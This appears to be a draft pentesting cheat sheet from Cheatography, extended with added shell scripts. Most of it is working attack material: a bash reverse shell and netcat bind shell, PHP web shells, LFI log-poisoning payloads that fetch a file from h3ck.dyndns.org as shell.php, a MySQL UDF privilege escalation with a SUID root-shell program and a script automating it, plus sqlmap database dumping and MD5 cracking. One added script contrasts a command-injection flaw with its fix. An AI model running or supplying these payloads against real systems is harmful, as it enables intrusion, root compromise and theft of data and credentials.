Cheatography

Pentesting Cheat Sheet (DRAFT) by

This is a draft cheat sheet. It is a work in progress and is not finished yet.

Enumeration

nmap -sn 10.0.0.0/24
host discovery (ping sweep) of the /24; `nmap 10.0.0.*` does the same sweep but also port-scans every host that answers
nast -m -i eth0
map the hosts on the local segment by sniffing eth0
nmap -sS -sU -sV -p U:1-65535,T:1-65535 <IP>
every TCP and UDP port with service versions (the U: range needs -sU and root; a full UDP range is slow)
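
The two nmap steps above chained together, as an added example that is not part of the cheat sheet: sweep first, parse the greppable output for the hosts that answered, then spend the slow full TCP+UDP version scan only on those. It assumes nmap is installed and you are root (needed for -sS and -sU); the range and the output file names are assumptions.

```shell
#!/bin/sh
# Added example, not from the cheat sheet: sweep the range first, then spend the
# slow full TCP+UDP version scan only on hosts that answered. Assumes nmap is
# installed and you are root (needed for -sS/-sU); the range and output names
# are assumptions.

# Read nmap greppable output (-oG -) on stdin, print one live IP per line.
# Lines look like:  Host: 10.0.0.5 ()   Status: Up
parse_live_hosts() {
    awk '/^Host:/ && /Status: Up/ { print $2 }'
}

# -sn: host discovery only, no port scan.
sweep() {
    nmap -sn -oG - "$1" | parse_live_hosts
}

# One IP per line on stdin; every port, both protocols, with version probes.
full_scan() {
    while IFS= read -r ip; do
        nmap -sS -sU -sV -p U:1-65535,T:1-65535 -oN "scan_$ip.txt" "$ip"
    done
}

# Usage: ./sweep.sh --run 10.0.0.0/24
if [ "${1:-}" = "--run" ]; then
    sweep "${2:-10.0.0.0/24}" | full_scan
fi
```

The parser keys on the `Status: Up` field of the `Host:` lines, so it also works on greppable output saved earlier with `-oG file`.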

BASH commands

cut -d" " -f2
split on the delimiter " " and print the second field
find / -user root
find files owned by a user (root here)
echo "text" | sed 's/regex/e/'
replace the first match of regex with "e" (add /g to replace every match)
bash -i >& /dev/tcp/192.168.1.88/6666 0>&1
bash reverse shell to 192.168.1.88:6666 (catch it with nc -lvp 6666)
find / -perm -4000 -type f 2>/dev/null
find SUID files (-perm -2000 for SGID)
; or ` or | or $() inside an argument chain a second command onto the first (command injection)
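
The last line is the whole of command injection, so here it is as an added example (not from the cheat sheet): a constructed "ping wrapper" that pastes its argument into a string a shell re-parses, next to one that allow-lists the input and passes it as a single quoted word. The wrapper only echoes the command it would run, so nothing is pinged.

```shell
#!/bin/sh
# Added example, not from the cheat sheet: why ";", backticks, "|" and "$()" inside
# an argument become a second command, and the fix. The "ping wrapper" is a
# constructed stand-in for any script or CGI that builds a command line from
# user input; it only echoes the command it would run, so nothing is pinged.

# Vulnerable: the argument is pasted into a string that a shell parses again,
# so shell metacharacters in $1 are interpreted.
ping_unsafe() {
    sh -c "echo ping -c 1 $1"
}

# Safe: allow-list the input and pass it as one quoted word, which the shell
# never re-parses. Returns 1 and runs nothing on bad input.
ping_safe() {
    case $1 in
        "" | *[!A-Za-z0-9.-]*) echo "rejected: $1" >&2; return 1 ;;
    esac
    echo ping -c 1 "$1"
}

# Returns 0 if feeding ARG to the vulnerable wrapper made the marker appear.
injected() {
    case $(ping_unsafe "$1" 2>/dev/null) in
        *INJECTED*) return 0 ;;
    esac
    return 1
}
```

Try `injected '8.8.8.8; echo INJECTED'`, then the same with backticks, `|` and `$()`: all four succeed against `ping_unsafe`, and `ping_safe` rejects every one of them because none passes the character allow-list.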

Sharing files without Apache

nc -w 5 -v -l -p 80 < file.ext
netcat serves one file on port 80 for a single connection; fetch it with nc <IP> 80 > file.ext
cd / && python -m SimpleHTTPServer
python serves the current directory tree over HTTP on port 8000 (starting from / makes any path fetchable); python3: python3 -m http.server

Mysql commands

Privilege escalation through the lib_mysqludf_sys UDF when logged in to mysql as root. It only works if that UDF is loaded (sys_exec is not built in) and mysqld itself runs as the OS root user; sys_exec returns the command's exit code, so 0 means it ran:
SELECT sys_exec('touch /tmp/thisisatest');

Compile this SUID shell as /tmp/exploit (gcc -o /tmp/exploit exploit.c):

#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    setresuid(0, 0, 0);   /* real, effective and saved uid to root */
    setresgid(0, 0, 0);
    system("/bin/bash");
    return 0;
}

SELECT sys_exec('chown root:root /tmp/exploit');

SELECT sys_exec('chmod +s,a+rwx /tmp/exploit');

then run /tmp/exploit for a root shell
-------
select load_file('/etc/passwd')
read a file through mysql (needs the FILE privilege; secure_file_priv may limit the directory)
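
The sys_exec chain above as one script, an added example that is not part of the cheat sheet. Assumptions: lib_mysqludf_sys is already loaded so sys_exec() exists, the MySQL root password is in the MYSQL_ROOT_PW variable, and mysqld runs as the OS root user (otherwise the chown fails); BIN and the variable name are assumptions.

```shell
#!/bin/sh
# Added example, not from the cheat sheet: the sys_exec() privilege-escalation
# chain from the notes above as one script. Assumptions: lib_mysqludf_sys is
# already loaded so sys_exec() exists, you can log in as the MySQL root user
# with the password in MYSQL_ROOT_PW, and mysqld runs as the OS root user
# (otherwise the chown to root fails). BIN is an assumed path.

BIN=${BIN:-/tmp/exploit}

# Write the SUID shell program (the sheet's C program plus its includes).
write_source() {
    cat > "$1" <<'EOF'
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    setresuid(0, 0, 0);   /* real, effective and saved uid to root */
    setresgid(0, 0, 0);
    system("/bin/bash");
    return 0;
}
EOF
}

# SQL that makes mysqld (as root) give the binary to root and set the SUID bit.
# 4755 is enough; the world-writable +s,a+rwx buys nothing extra.
# sys_exec() returns the command's exit status, so each SELECT should show 0.
udf_sql() {
    printf "SELECT sys_exec('chown root:root %s');\n" "$1"
    printf "SELECT sys_exec('chmod 4755 %s');\n" "$1"
}

run() {
    write_source "$BIN.c"
    gcc -o "$BIN" "$BIN.c"
    udf_sql "$BIN" | mysql -u root -p"${MYSQL_ROOT_PW:?set MYSQL_ROOT_PW}"
    ls -l "$BIN"      # expect -rwsr-xr-x root root
    "$BIN"            # root shell if every assumption held
}

# Usage: MYSQL_ROOT_PW=... ./udf_privesc.sh --run
if [ "${1:-}" = "--run" ]; then
    run
fi
```

If `ls -l` shows the file still owned by the mysql user, mysqld is not running as root and this path is closed; look at what that user can write instead.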

Password cracking

john --rules --wordlist=/pentest/passwords/wordlists/darkc0de.lst --users=aadams /root/de-ice/aa
wordlist attack with mangling rules, restricted to user aadams in the password file
./john /tmp/hash --format=raw-md5
crack bare MD5 hashes (john cannot autodetect the format, so name it)
echo <base64string> | base64 --decode
base64 is an encoding, not encryption: just decode it
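
What `--rules --wordlist` does against a raw MD5 hash, spelled out as an added example that is not part of the cheat sheet: every wordlist entry is mangled by a toy rule set (as-is, capitalised, digit suffixes), each candidate is hashed with md5sum and compared to the target. The wordlist and the hash used in the test are constructed; a real run uses darkc0de.lst and john's much larger rule set.

```shell
#!/bin/sh
# Added example, not from the cheat sheet: what "john --rules --wordlist" does
# against a raw MD5 hash, spelled out. Each wordlist entry is mangled by a toy
# rule set (as-is, capitalised, digit suffixes), hashed with md5sum and compared
# to the target. The wordlist and hash used to test this are constructed; a
# real run would use darkc0de.lst and far more rules.

md5() { printf '%s' "$1" | md5sum | cut -d' ' -f1; }

# Print every candidate the toy rules derive from one word, one per line.
mangle() {
    first=$(printf '%s' "$1" | cut -c1 | tr 'a-z' 'A-Z')
    rest=$(printf '%s' "$1" | cut -c2-)
    for base in "$1" "$first$rest"; do
        echo "$base"
        for n in 1 2 3 123 2024; do
            echo "$base$n"
        done
    done
}

# crack HASH WORDLIST: print the plaintext and return 0, or return 1.
crack() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    while IFS= read -r word; do
        [ -n "$word" ] || continue
        hit=$(mangle "$word" | while IFS= read -r cand; do
            if [ "$(md5 "$cand")" = "$target" ]; then
                echo "$cand"
                break
            fi
        done)
        if [ -n "$hit" ]; then
            echo "$hit"
            return 0
        fi
    done < "$2"
    return 1
}
```

With a three-word list containing "password", `crack "$(md5 Password1)" words.txt` prints `Password1`: the capitalisation rule plus the "1" suffix found it, which is exactly the kind of variation `--rules` exists for.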

LFI attack

php streams
index.php?page=data://text/plain,%3C%3Fphp%20system%28%22uname%20-a%22%29%3B%20%3F%3E
the data:// wrapper carries the PHP inside the URL; needs allow_url_include=On (data://text/plain;base64,... also works)
log poisoning: index.php?page=/var/log/apache2/access.log&cmd=ls
include a log that already holds <?php system($_GET["cmd"]); ?> and pass the command in a parameter

error.log: a request for a path that does not exist is logged there, so the payload can go in the URL
but a browser URL-encodes the payload and that encoded form is what gets logged, so it will not run
telnet (a raw request line) or the User-Agent header get it into access.log unencoded:
GET /<?php exec('wget http://h3ck.dyndns.org/ani.txt -O shell.php'); ?>

GET /<?php phpinfo(); ?>

-----------------------
lfi + auth.log readable by the web server + ssh: the rejected username is written to /var/log/auth.log (often root:adm 0640, so check first)

ssh '<pre><?php echo system($_GET["cmd"]); exit; ?>'@h3ck.dyndns.org
-----
/proc/self/environ -> HTTP_USER_AGENT (put the payload in the User-Agent)
/proc/self/cmdline
/proc/self/fd/1,2,3.. (files the web server process has open, its logs included)

Php executing commands

<?php system($_REQUEST['cmd']); ?>
<?php $handler = popen($_GET['cmd'], 'r'); $read = fread($handler, 2096); echo $read; pclose($handler); ?>
wget -O /tmp/bd.php <url_to_malicious_file> && php -f /tmp/bd.php
other functions that run commands: exec, shell_exec, passthru, proc_open, backticks (check disable_functions in php.ini for what is blocked)

Pseudo-terminal to real shell

python -c 'import pty; pty.spawn("/bin/bash");'
spawn a pty; then Ctrl-Z, stty raw -echo, fg and export TERM=xterm for a fully interactive shell
to pass a Ctrl-C through to the remote program instead of killing nc locally, type Ctrl-V Ctrl-C then Enter (sends a literal ^C, which the remote pty turns into an interrupt)
nc -l -p 6666 -e /bin/bash
bind shell (-e needs a netcat built with it, e.g. nc.traditional or ncat)
nc IP 6666
connect to the bind shell
os.system('/bin/bash')
from a Python prompt or eval context (import os first)
/bin/sh -i
interactive sh

SQL injection

./sqlmap.py -u http://192.168.60.138 --forms
find the forms on the page and test their fields
./sqlmap.py -u http://192.168.60.138 --forms --risk=3 --level=3 --dbs
heavier payload set, then list the databases
./sqlmap.py -u http://192.168.60.138 --forms --risk=3 --level=3 -D members --dump
dump the tables of the members database

Wordlists & Exploits

/pentest/passwords/john/password.lst
/opt/framework/msf3/data/john/wordlists/password.lst
cd /pentest/exploits/exploitdb/ && grep -i wordpress files.csv | grep 1.5.1
search the local Exploit-DB index (on current installs: searchsploit wordpress 1.5.1)